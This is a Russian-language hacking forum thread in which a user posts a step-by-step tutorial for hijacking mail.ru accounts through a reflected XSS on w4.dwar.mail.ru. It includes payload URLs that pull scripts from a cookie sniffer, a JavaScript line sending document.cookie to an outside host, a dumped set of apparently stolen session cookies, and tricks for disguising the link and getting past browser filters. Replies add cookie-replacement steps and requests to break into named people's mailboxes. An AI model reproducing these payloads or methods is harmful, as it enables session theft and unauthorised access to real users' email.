Цитата:

Сообщение от tickhack

пока незнаю но уже думаю об этом.

молоток что нашел

а обойти тут нет труда
у меня приходят куки
снифер использовал свой приватный

code:

VID=209Pg10AjVWy; mrcu=FC724F225A1A30402A7D0100007F; p=EcMGAEp owAA; b=Bjw5BEAF5QAA8rMu8EbHAHB1gunYC2K2LhDmx2CCHgOCVwy TCw4C74AJHUCUjUMhOAxsGK9IFOtghQWC8iCJ0gpyACC8MLF3x l1oCbc7Z8QeQ3CP8QgxYsm9A2gcDcdxFXfGS3JJ1x2CLGLckhb thgJ90QEAABxF3/GvdgYfatBNLycsLguwruHCL8ZI2wNoJDiIEJPTRFxOUfsfBqRh 2jCITwQj/NBdKECUdp4Qj ECPtYIkzpGbE3gMKvuQjtPyccywEhvvwPKZ/ J5hsjTEA; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAQABBAIGAIAAAAAAAgAdAQgLtgcA; mid=62ad25d4; i=AQA98yNPAgACAAUCAQATAAgEARUAAQ==; mc1=1328280937; c=3/QjTwAAEBVpCAARAAgAHgAyAvcAAAAg; odklmapi=$$8SxEBds2OmrpriJjFY2wYhUEhlrqaWwOSsWt2CH Sy7SV=c; PHPSESSID=162802d913dd017b7aed594c9eae6836; __utma=103147462.1831527631.1327777722.1327777722. 1327777722.1; __utmb=103147462; __utmc=103147462; __utmz=103147462.1327777722.1.1.utmccn=(direct)|ut mcsr=(direct)|utmcmd=(none); __utma=1.1627511399.1327777729.1327777729.13277777 29.1; __utmb=1.4.10.1327777729; __utmc=1; __utmz=1.1327777729.1.1.utmcsr=(direct)|utmccn=(di rect)|utmcmd=(none); partner_session_day=28; partner_id=1_678_60738_0__

просто ставь таким образом скрипт

PHP highlight



http://наша_пасивка_адрес_где_пойм али_хss/register.php?referrer=">

Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hpc.name/sniffer/
3.Мозги и руки !
Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
source:


%
3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"


мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/ (https://hpc.name/redirector.html#http://tinyurl.com/)
заходим на этот сайт и где написано
source:


Enter
a
long URL
to
make tiny:


вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
source:


make
a
TinyURL


И у нас появится ссылка http://tinyurl.com/823p5w9 (https://hpc.name/redirector.html#http://tinyurl.com/823p5w9) ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
ну чтож думаю всё !
→Видео к статье← (https://hpc.name/downloads.php?do=file&id=3411)
Пароль на видео hacker-pro.net
Автор:tickhack hacker-pro.net

Спасибо!)Где бы еще пассивку взять..?)

Я попробывал приходит emil а пароль нет почему ?

Цитата:

Сообщение от dryha_777

Я попробывал приходит emil а пароль нет почему ?

на сниффер придутут cokies их надо в опере поменять на свои но только не все только од строчки mpop до строчки мыло@mail.ru:
cokies меняют так настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы

Цитата:

Сообщение от Andorfin

Спасибо!)Где бы еще пассивку взять..?)

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
вот же она

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

Цитата:

Сообщение от Andorfin

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

пока незнаю но уже думаю об этом.

пароль какой на видео ? в архиве

Дополню: если есть проблемы с настройкой снифера, используйте удобную программу "бабай".

Цитата:

Сообщение от dryha_777

пароль какой на видео ? в архиве

hacker-pro.net

всё делаю по инсструкции но всеравно не преходят!!

Цитата:

Сообщение от tickhack

на сниффер придутут cokies их надо в опере поменять на свои но только не все только од строчки mpop до строчки мыло@mail.ru:
cokies меняют так настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы

9 zdelal kak ti skazal potom 4e 9 ne ponel plz raskaji po podrobnee osobeno s cokies 9 zdelal vse i komne priwlo v snifer 9 postavil cokies potom 4e?

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

Куки приходят, но зайти через них не получается( Так как только вставляешь Mpop => закрыть (пробовал через оперу) Всплывает окно с авторизацией)

Цитата:

Сообщение от rox@hak

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

Спасибо за совет попробую что нибуть придумать

Цитата:

Сообщение от RED_DEVIL_69

Куки приходят, но зайти через них не получается( Так как только вставляешь Mpop => закрыть (пробовал через оперу) Всплывает окно с авторизацией)

куки выглидат так 6325749802:4f015258665e2ef6150502190f1d081b0a014f6 c5150445e070f00050d1d000b03184b4c515958421c0e0d165 8505d5b174345:мыло@mail.ru: их ты должен вставить в опере как вставлять я уже объяснял

Цитата:

Сообщение от petrovip86

всё делаю по инсструкции но всеравно не преходят!!

попробуй ещё !

Не надо переходит по моей ядовитой ссылки ато мне уже надоело удалять ваши cokies с сниффера

Цитата:

Сообщение от tickhack

Не надо переходит по моей ядовитой ссылки ато мне уже надоело удалять ваши cokies с сниффера

dai mne email ob9sni esli ne slojna

Цитата:

Сообщение от bugagaga

dai mne email ob9sni esli ne slojna

101023043 заходи в аську

Цитата:

Сообщение от tickhack

101023043 заходи в аську

netu aski dai email ili je skype

скайп ya201010
icq 357698309
кто поможет отблагодарю

спасибо большое tickhack помог

Цитата:

Сообщение от Yorvet

Дополню: если есть проблемы с настройкой снифера, используйте удобную программу "бабай".

бабай не у всех работает , например у меня не работает

1.2 не у всех. 1.0, по моим наблюдениям, у всех.

tickhack,спасибо,все получается,куки приходят,НО...когда пытаешься перейти по яд.ссылке,выскакивает окошко

http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif (https://hpc.name/redirector.html#http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif)

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???

Цитата:

Сообщение от m744na

tickhack,спасибо,все получается,куки приходят,НО...когда пытаешься перейти по яд.ссылке,выскакивает окошко

http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif (https://hpc.name/redirector.html#http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif)

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

Цитата:

Сообщение от tickhack

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

пример своей ссылки можешь сделать?

Цитата:

Сообщение от m744na

пример своей ссылки можешь сделать?

с редиректом ?

дадада

Цитата:

Сообщение от m744na

дадада

установи сниффер м@з@хакера у него там есть ссылки с редиректом
вот ссылка на сниффер сниффер (https://hpc.name/redirector.html#http://hacker-school.ucoz.ru/files/Sniffer.rar)

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???
Как обходятся такие вещи? Ищутся подобные, не слишком популярные сервисы по укорачиванию ссылок. Пользуются ими. Если же и там выскакивает, то можно зарегистрировать сайт на любом бесплатном хостинге (можно даже без php) и залить как главную страницу след. содержания

code:





Возможно, на некоторых особо популярных хостингах на всех доменах третьего уровня выскакивает подобное предупреждение. Тогда придется раскошелиться на домен второго уровня и на платный хостинг (займет макс 130 р.). Но легче найди какой-нибудь неизвестный системе забугорный бесплатный хостинг и там проделать подобное. А вообще, такие ссылки с переадресациями на пассивку умные люди не делают. Умные люди заманивают на страницу, в которой в скрытом фрейме спрятана пассивка, и через секунду перекидывают именно на ту страницу, что указана в письме. То есть пользователь и видит именно то, что хотел увидеть, и ничего сверхъестественного не подозревает. А куки тем временем у нас. крытый фрейм, если кто не помнит, задается так:

code:



А вообще люди, то, что вы сейчас делаете - неразумное баловство. Я ничего против ХSS не имею, но использовать ее надо с умом. Я уверен, так, как вы используете, взломаете лишь пятиклассника Васю Пупкина максимум. И то не факт. Готовить атаку надо с умом, чтобы жертва совсем ничего не заподозрила! Ни на какие tinyurl не надо ссылки давать, ссылка должна быть наименее палевная, желательно в виде домена второго уровня, пассивка должна быть на сто рядов спрятана в коде, желательно в каких-нибудь огромных файлах скриптом для главной странице в виде небольшой функции в середине кода, чтобы хрен кто ее нашел... Сниффер нужно устанавливать свой, на свой хостинг, ибо здешний сниффер палится антивирусами по домену. Само сообщение с пассивкой должно быть продумано и ставило сель заманить по ссылки, и пользователь затем бы видел то, что и ожидал увидеть. И ничего бы не заподозрил. А так вы только своими некачественными действиями тратите драгоценные пассивки, которых на mail.ru не очень много и ценятся они в тысячах рублей.

tickhack,я потому и прошу пример ТВОЕЙ!!! ссылки,потому как не могу разобраться что и куда ...если используем редирект.

Цитата:

Сообщение от m744na

tickhack,я потому и прошу пример ТВОЕЙ!!! ссылки,потому как не могу разобраться что и куда ...если используем редирект.

тебе только что написали всё читай !

Цитата:

Сообщение от Nick Hander

и через секунду перекидывают именно на ту страницу, что указана в письме.

вот и прошу пример полной ссылки с редиректом
Nick Hander,может ты подскажешь?

ничерта редирект не получается(((((((((

блин,ну подскажите пожалуйста как сюда

вставить редирект?спасибо

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Цитата:

Сообщение от m744na

блин,ну подскажите пожалуйста как сюда

вставить редирект?спасибо

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

m744na
Учи javascript, дружок. Формируй сам код для атаки, используя location.href - как перенаправления, а setTimeout() для ожидания.

Nick Hander,и на том спасибо (за наводочку))

а как менять в мозиле то мне пришли кукри мозилы

качайте видео (https://hpc.name/redirector.html#http://letitbit.net/download/85733.8ec36bf0b72bd83928733b257c1e/xss.rar.html) отредактируйте файл xss.jpg измените ссылку на свой снифер

сам .js файл

PHP highlight



img= newImage();img.src="httpz://ссылка на снифер/s.gif?"+document.cookie;

Цитата:

Сообщение от tickhack

куки выглидат так 6325749802:4f015258665e2ef6150502190f1d081b0a014f6 c5150445e070f00050d1d000b03184b4c515958421c0e0d165 8505d5b174345:мыло@mail.ru: их ты должен вставить в опере как вставлять я уже объяснял

Я прекрасно знаю как выглядят КУКИ, и куда их нужно вставлять... И пиши правильно слова... Не нужно торопиться)

Цитата:

Сообщение от beknazar

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

наверно так и есть что ты вышел с этого мира тебе наверно лень скачать видео который я скинул ,там все показано как при помощи ифраме в картинке без всяких редиректов угнать кукисы,
а для хроме много вариантов пример этот вот скриптик

PHP highlight



varWshShell=WScript.CreateObject("WScript.Shell");
WshShell.Run("Chrome.exe httpz://На это влияет браузер? я � �умаю что нет");





то есть вместо Chrome.exe поставить можно так iexplore.ехе

если мы знаем точно что жертва пользуется хроме то запустится вместо Chrome.exe ---> iexplore.ехе
и кинет на ссылку ,в этом случае мы избегаем запуск самого хроме по умолчанию.

так же можно сделать и с оперой ,
если мы знаем что хроме стоит у жертвы по умолчанию.

Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif (https://hpc.name/redirector.html#http://s.gif) делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;

это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме
пример:

PHP highlight



http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%20behavior= %22scroll%22%20direction=%22left%22%3E%3Cdiv%20sty le=%22text-align:center;%22%3E%3Cimg%20src=%22http://www.htmlcodes.me/images/marquees/flying_bat.gif%22%20width=%22125%22%20height=%2282 %22%20alt=%22Flying%20bat%20in%20a%20marquee%22%20/%3E%3Cbr%20/%3EBruce%20the%20Bat%3C/div%3E%3C/marquee%3E%3Cp%3E%3Ca%20style=%22font-size:11px;color:#999;" href="http://www.html.am/html-editors/online-html-editor.cfm">HTML editor0height="82"%20alt="Flying%20bat%20in%20a%20marquee"%20/>Bruce%20the%20BatHTML editorrquee>marquee>





теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif (https://hpc.name/redirector.html#http://www.htmlcodes.me/images/marquees/flying_bat.gif) <--- на наш который будет в картинке ,если Вы оставите расширение .jsто куки не придут ,если дадите прямую ссылку на снифер то на снифер придет только адрес оттуда откуда Вы запустили яд.

Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Конечно же ведь опера хорошо запасается всеми ресурсами да и страницы сохраняеет почти как оригинал.

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Пожалуйста помогите как взламывать емайлы, а уже 100 программ скачала везде то вирусы то смс платная, elena-vladimirova@bk.ru вот мой мейл, кто поможет буду благодарна!

Нельзя куки украсть с хрома, а потом со своими поменять, что бы зайти на чужой аккаунт?

Цитата:

Сообщение от rox@hak

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

если получилось что то полезное то не откажусь от +

уже не работает=\

кто подскажет как в IE куки заменить? вычитал,что это невозможно,но не верю...)

Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

В Mozzila тоже самое, куки не приходят, так что если у жертвы мазила то пролет

Цитата:

Сообщение от miarhipov

В Mozzila тоже самое, куки не приходят, так что если у жертвы мазила то пролет

Всё работает вот только пассивка умерла =(
P.S:Кому нужна пассивка писать на личку

если здесь еще шоколадный заяц присутствует то не все еще потеряно
посмотреть на негра жми сюда (https://hpc.name/redirector.html#http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%3E%3Cimg%20 src=%22http://www.x-top.org/images/prikol/2009/08/05/4a799b59741f8.jpg%22%3E%3C/marquee%3E)

по крайне мере у меня все приходит (https://hpc.name/redirector.html#http://pixs.ru/showimage/zajcbmp_8981380_3913585.jpg)

#################################################;

«Намеки тонкие на то, чего не ведает никто.»

подскажите пожалуйста в каком направлении думать над обходом 704 ошибки на мейле?

Привет всем! у меня есть ссылка
http://w4.dwar.mail.ru/register.php?referrer=">%3CSCRIPT type=text/javascript src=http://httpz.ru/nsat6gmjrq0.gif>"
что в нее надо добавить,чтобы приходили куки...приходят айпи и браузер только! подскажите...

Это не в скрипт строки надо, это в скрипт сниффера-"картинки".

Цитата:

Сообщение от nokiahack

Привет всем! у меня есть ссылка
http://w4.dwar.mail.ru/register.php?referrer=">%3CSCRIPT type=text/javascript src=http://httpz.ru/nsat6gmjrq0.gif>"
что в нее надо добавить,чтобы приходили куки...приходят айпи и браузер только! подскажите...

а откуда она у тебя ?
спалите не себе не людям

не ужели так трудно догнать

PHP highlight



пиши в PHP коде





примерно так или скрин (https://hpc.name/redirector.html#http://pixs.ru/showimage/zajcbmp_8981380_3913585.jpg)

я о том что
Все новые и обновившиеся сайты, а также неработающие ссылки помечаются для обновления в индексе Google.
и скоро и негра не увидите | посмотреть на Негра (https://hpc.name/redirector.html#http://pixs.ru/showimage/zajcbmp_8981380_3913585.jpg) .

Цитата:

Сообщение от MOV_EAX

а откуда она у тебя ?

Увы, выложена в соответствующей теме без хайда.

Цитата:

Сообщение от tickhack

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

ёпт, попробуй другой сервис коротких ссылок и всё

добавься в асю 8944039

Я делаю всё по инструкции как в видео , и когда открываю ссылку готовую он у меня тормозит на XSSе (w4.dwar.mail.ru/register.php?referrer= ) и всё,дальше не идет и куки не приходят !! что я делаю не так ??

Цитата:

Сообщение от _Xacker_

Я делаю всё по инструкции как в видео , и когда открываю ссылку готовую он у меня тормозит на XSSе (w4.dwar.mail.ru/register.php?referrer= ) и всё,дальше не идет и куки не приходят !! что я делаю не так ??

Браузер то какой?

Цитата:

Сообщение от Dinga

Браузер то какой?

пробовал через оперу 11

Цитата:

Сообщение от _Xacker_

пробовал через оперу 11

через мазилу и хром такая же песня(

походу XSS которая в видио была умерла ?:(

Цитата:

Сообщение от _Xacker_

походу XSS которая в видио была умерла ?:(

да , она уже не актуальна .

У кого возникнет желание помочь научить или взломать почту на майле anton1947.2011@mail.ru, делитесь опытом не крысятничайте

а если нету "такая вкладка mpop" и как на хроме делать?

На все вышеперечисленные просьбы и вопросы,хочется ответить кратко,но все таки попытаюсь ответить с точки зрения своего мировоззрения(вот такой каламбур!)
новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет. Будут ЯЗВЫ,УПРЕКИ, предложения учить хтмл,яву и прочее.Это в лучшем случае,а в хучшем забанят(как например меня(за то что задал вопрос не в той теме(а-ха-ха))) или пошлют куда подальше...Также Вам предложат изучить математику с первого по пятый класс(Кстати по аттестату по данному предмету у меня пятерки(так же как и по русскому языку)).В отличии от некоторых,у которых в предложении по 12 грамматических ошибок.(зато взламывают как истинные хакеры))))))))).Так вот... продолжим... просил помощи в изучении пассивки(спасибо тем кто откликнулся и в личке помог,не буду называть ников...).НО на форуме реальной помощи не получил.А для чего он существует???Наверное,чтоб упрекать новичков,что у них руки не под то заточены и голова не на том месте??? НАКИПЕЛО!!! не хотел много писать,но руки сами клаву жмут.......Извините если кого обидел...УДАЧИ...АЛЕКСАНДР....

Цитата:

Сообщение от m744na

На все вышеперечисленные просьбы и вопросы,хочется ответить кратко,но все таки попытаюсь ответить с точки зрения своего мировоззрения(вот такой каламбур!)
новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет. Будут ЯЗВЫ,УПРЕКИ, предложения учить хтмл,яву и прочее.Это в лучшем случае,а в хучшем забанят(как например меня(за то что задал вопрос не в той теме(а-ха-ха))) или пошлют куда подальше...Также Вам предложат изучить математику с первого по пятый класс(Кстати по аттестату по данному предмету у меня пятерки(так же как и по русскому языку)).В отличии от некоторых,у которых в предложении по 12 грамматических ошибок.(зато взламывают как истинные хакеры))))))))).Так вот... продолжим... просил помощи в изучении пассивки(спасибо тем кто откликнулся и в личке помог,не буду называть ников...).НО на форуме реальной помощи не получил.А для чего он существует???Наверное,чтоб упрекать новичков,что у них руки не под то заточены и голова не на том месте??? НАКИПЕЛО!!! не хотел много писать,но руки сами клаву жмут.......Извините если кого обидел...УДАЧИ...АЛЕКСАНДР....

Это точно! В этом я уже убедился.

Цитата:

Сообщение от m744na

новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет.

Разумеется. Никто и никогда! А целая свора статей с информацией о взломе и психологии, бесплатные раздачи, выполнение просьб - это так, для куражу. Нет бы спасибо сказать за то, что такие сайты вообще существуют (без них бы ты собирал информацию по огрызкам и платил баксы за каждый совет или кусок кода) и попытаться понять почему тебе помогать не хотят.

А резоны тут вполне приемлимые. Местные закоренелые обитатели - взрослые (по крайней мере разумом уж точно), занятые люди. Они итак делают одолжение самим наличием наполнения сайта. И им, а так же менее "давним" обитателям вроде меня, противно видеть то, что происходит. Вот просмотри форум и ответь на вопросы: кто из последней сотни зарегистрировавшихся читал правила? Кто из них вообще знает о наличии этих правил? Судя по всему, никто, ведь последняя сотня тем создана вот везде, но только не там, где надо. Обсуждается тема дменов и хостингов? Разумеется, нужно создать в разделе тему "памагите взламать кантакт!!!". Ты пробегись глазами по форуму - сплошь и рядом такое! А ещё вот это "привет, научите меня\расскажите мне то-то и то-то" - такие темы создаются обычно прямо над\под темами, в которых это разжёвывается по полной программе (иногда не по первому разу уже). И ладно бы просто тупо клянчили, так ещё пытаются на детсадовский понт взять: "не будьте крысами!" тому подобное. За такое, между прочим, морды бьют в реальной жизни, учтите это. Легионы новичков задают одинаковые вопросы, поражающие своей безграмотностью и тупизной. И не ламерские вопросы, а именно тупые, так что даже понять порой невозможно без допрося паяльником.

Итого что мы имеем: новички не желают читать правила, не желают пользоваться поиском, считают что все им должны, то есть плюют на чужое время, не уважают людей и правила этого "дома", и ещё выёживаются. Тупые, безграмотные эгоисты. И что, им мы должны помогать?
Если человек соблюдает хотя бы правила приличия, то ему рады помочь. Просто они не кричат об этом на каждом углу, как это делают недовольные. Незнаешь ничего - язык за зубами держи и не выпендривайся, тогда помогут.

Цитата:

Сообщение от m744na

по аттестату по данному предмету у меня пятерки(так же как и по русскому языку))

Ага, заметно. Особенно впечатляет твой "русский язык" нижнекукуевского наречия.

Цитата:

Сообщение от m744na

НАКИПЕЛО!!!

Если накипело, прыгни в холодную воду и остудись. Иначе нарвёшься как-нибудь на человека, который не поймёт твоих "шуток", и будешь потом зубы по углам собирать.
Такие вот дела.

А теперь вопрос залу: кто-нибудь поделится пассивокй на меил в ЛС (использую редко, палить её не собираюсь, просто очень нужна), буду благодарен.

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:



Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

Цитата:

Сообщение от Yorvet

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:



Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

Привет а ты попробуй на tinurl зашифровать и получется обычная ссылка которую почтовик поддерживает

Цитата:

Сообщение от tickhack

Привет а ты попробуй на tinurl зашифровать и получется обычная ссылка которую почтовик поддерживает

На такие ссылки давно уже WoT ругаемся прежде чем перейти на них.

у когонибудь фейки приходят на майл?ответьте!!!

У меня нет.

Цитата:

Сообщение от Yorvet

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:



Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

тебе тут активка нужна, так как

Цитата:

Сообщение от chelyuskin

создал страницу на которую даешь ссылку. в этой странице в коде пишеш уже код который тебе нужен

Спасибо. А не мог бы ты сказать как должен выглядеть код страницы, чтобы при редиректе выполнялся скрипт?

Цитата:

Сообщение от chelyuskin

тебе тут активка нужна, так как

не обязательно активка, достаточно создать страницу с ифреймом, в src указать адрес пасивки! послать жертве ссылку на страницу с ифреймом!

у меня вопрос
а этот код (http://w4.dwar.mail.ru/*register.php#?referrer=">) отправлять в письме тому чью куки хочешь украсть или как?
я просто новичок в этом. автор опишика по подробнее

по сделанной ссылке выходит ошибка а в логе снифера ниичего нет

для проверке кликнул по ссылке http://w4.dwar.mail.ru/*register.php...C/SCRIPT%3E%22 (https://hpc.name/redirector.html#http://w4.dwar.mail.ru/*register.php#?referrer=%22%3E%3CSCRIPT%20type=tex t/javascript%20src=http://httpz.ru/kdpigfhiy2go.js%3E%3C/SCRIPT%3E%22)
выдает ошибку
404 NOT Found !!!
The requested URL /*register.php was not found on this server.
Apache Server at w4.dwar.mail.ru Port 80
в чем дело?
может прикрепить пассивку к другой ссылке?

Цитата:

Сообщение от alfred_bboy

у меня вопрос
а этот код (http://w4.dwar.mail.ru/*register.php#?referrer=">) отправлять в письме тому чью куки хочешь украсть или как?
я просто новичок в этом. автор опишика по подробнее

К этому коду ты должен в конце подставить свой код для пассивной xss атаки он находится в твоем сниффере после > пишешь свой код для пассивной xss атаки и отправляешь жертве

Цитата:

Сообщение от alfred_bboy

по сделанной ссылке выходит ошибка а в логе снифера ниичего нет

для проверке кликнул по ссылке http://w4.dwar.mail.ru/*register.php...C/SCRIPT%3E%22 (https://hpc.name/redirector.html#http://w4.dwar.mail.ru/*register.php#?referrer=%22%3E%3CSCRIPT%20type=tex t/javascript%20src=http://httpz.ru/kdpigfhiy2go.js%3E%3C/SCRIPT%3E%22)
выдает ошибку
404 NOT Found !!!
The requested URL /*register.php was not found on this server.
Apache Server at w4.dwar.mail.ru Port 80
в чем дело?
может прикрепить пассивку к другой ссылке?

Эту пассивную xss уже давно прикрыли так как она слишком долго находилась в паблике

ошибка 404 выходит(

Спасибо большое tickhack всё работает сперва у меня не работало но я купил пассивку и заработало !!!!!!!!!!!!!

Цитата:

Сообщение от Miracle_In_DotA

чёт не пашет или я чёто не сделал правильно подскажите ниче не приходит((

НУ конечно не будет если ты этой пассивкой будешь пользоваться купи новую или найди сам потом зароботает!

чёт не пашет или я чёто не сделал правильно подскажите ниче не приходит((

Есть 1 пассивка, но параметр Mpop она не дает...

IMAGE (https://hpc.name/redirector.html#http://rghost.ru/36804797/image.png) http://rghost.ru/36804797/image.png

Подкиньте, бро, кому не жалко пассивочку в ЛС.

Сейчас куки мало что дадут. Вроде существует обход для захода в ящик, но его нужно поискать _) Через куки можно в соц. сети полазить.

Цитата:

Сообщение от Ixacker

Сейчас куки мало что дадут. Вроде существует обход для захода в ящик, но его нужно поискать _) Через куки можно в соц. сети полазить.

Ты хочешь сказать сейчас подмена куков на почтовиках не актуальна? Только в соц. сетях?

Цитата:

Сообщение от .SET

Ты хочешь сказать сейчас подмена куков на почтовиках не актуальна? Только в соц. сетях?

Попробуй зайти в почту Mail.ru через Mozilla, скопировать Mpop и вставить в Opera.

Да и взломом это назвать трудно.

dvj1, все работает... Иди в школу.

Цитата:

Сообщение от Ixacker

Да и взломом это назвать трудно.

Ну тут ты точно загнул. СИ считают взломом, а уж кражу куков-то, пфф...

Цитата:

Сообщение от .SET

dvj1, все работает... Иди в школу.

Ну тут ты точно загнул. СИ считают взломом, а уж кражу куков-то, пфф...

Прочёл бы название темы сначала.

всё сделал по инструкции но куки не приходят совсем и даже ip не приходит
объясните что мне надо сделать или искать что то ещё

source:


так я понял это была пассивка http://w4.dwar.mail.ru/register.php?referrer=
"> но теперь она не работает, и что мне нужно искать взамен?
или можно создать сайт на народе или где нибудь ещё с пассивной XSS

Цитата:

Сообщение от a899746

объясните что мне надо сделать или искать что то ещё

Пассивку ищи рабочую, и будет тебе счастье...

Цитата:

Сообщение от .SET

Ты хочешь сказать сейчас подмена куков на почтовиках не актуальна? Только в соц. сетях?

Это не так. Сейчас в некоторых проэктах действительно кукисы уже не являются средством взлома, они привязываются к сессии. Например такое сейчас ВКонтакте. В других почтовиках и соцсетях кукисы по-прежнему способны подсобить нам. А в некоторых социалках всё ещё даже шифруется пароль в куках. Вот так то.

Цитата:

Сообщение от Yorvet

А в некоторых социалках всё ещё даже шифруется пароль в куках.

Пароля в куках уже ни один нормальный программист не оставляет. Только отсталые так делают.

как взломать акаунт для танков онлайн

Цитата:

Сообщение от tima85

как взломать акаунт для танков онлайн

Так же как и остальные онлайн игры. Или самому, или заплатить. По сообщению понятно что ты сам этого не сделаешь, поэтому плати и за тебя взломают.

code:

http://w4.dwar.mail.ru/register.php?referrer=">

тут пассивка вроде работает, только фильтр стоит

Цитата:

Сообщение от geniy_07

code:

http://w4.dwar.mail.ru/register.php?referrer=">

тут пассивка вроде работает, только фильтр стоит

не пашет...

это не из видео пассивочка-то?

А как сделать новую пасивку?

Цитата:

Сообщение от Jonathan57

А как сделать новую пасивку?

Её надо найти.

Цитата:

Сообщение от _Werewolf_

Её надо найти.

А как? есть статья или урок как находить пасивки?
Видел урок от tickhack как найти уязвимость к пасивке на сайте videosaver.ru но там похоже это прикрыли... И так я не понял как находить...

Цитата:

Сообщение от Jonathan57

А как? есть статья или урок как находить пасивки?
Видел урок от tickhack как найти уязвимость к пасивке на сайте videosaver.ru но там похоже это прикрыли... И так я не понял как находить...

">alert(xss)

Цитата:

Сообщение от geniy_07

тут пассивка вроде работает, только фильтр стоит

Уж сто лет как закрыли её.

Если не можеш найти пассивку купи.
так как новичок ,потратит много времени на поиск xss на крупном сервисе просто так.

Люди походу пасивку прикрыли ((

а можно сделать отправку на мыло? или на фтп? расскажитеплиз

Цитата:

Сообщение от adasik

а можно сделать отправку на мыло? или на фтп? расскажитеплиз

Да, можно. Попробуй функцию "mail()"

Цитата:

Сообщение от kakashka333

а как контакт взломать напишите плиз

Флуд, хотя и не очень большой. Контакт ломается так же как и майл. Различия небольшие.

Я не понял,что в Пассивная XSS писать?

Пиши вот это:
code:

Ich will ficken!

Если честно, хоть бы вопросы чтоли задавать правильные начали...

Цитата:

Сообщение от Yorvet

Пиши вот это:
code:

Ich will ficken!

Если честно, хоть бы вопросы чтоли задавать правильные начали...

Или You fucked by (nick)

Цитата:

Сообщение от slash122

Я не понял,что в Пассивная XSS писать?

Такие люди вообще убивают .

Цитата:

Сообщение от whitehack

Или You fucked by (nick)

You fucked by %User%!!!

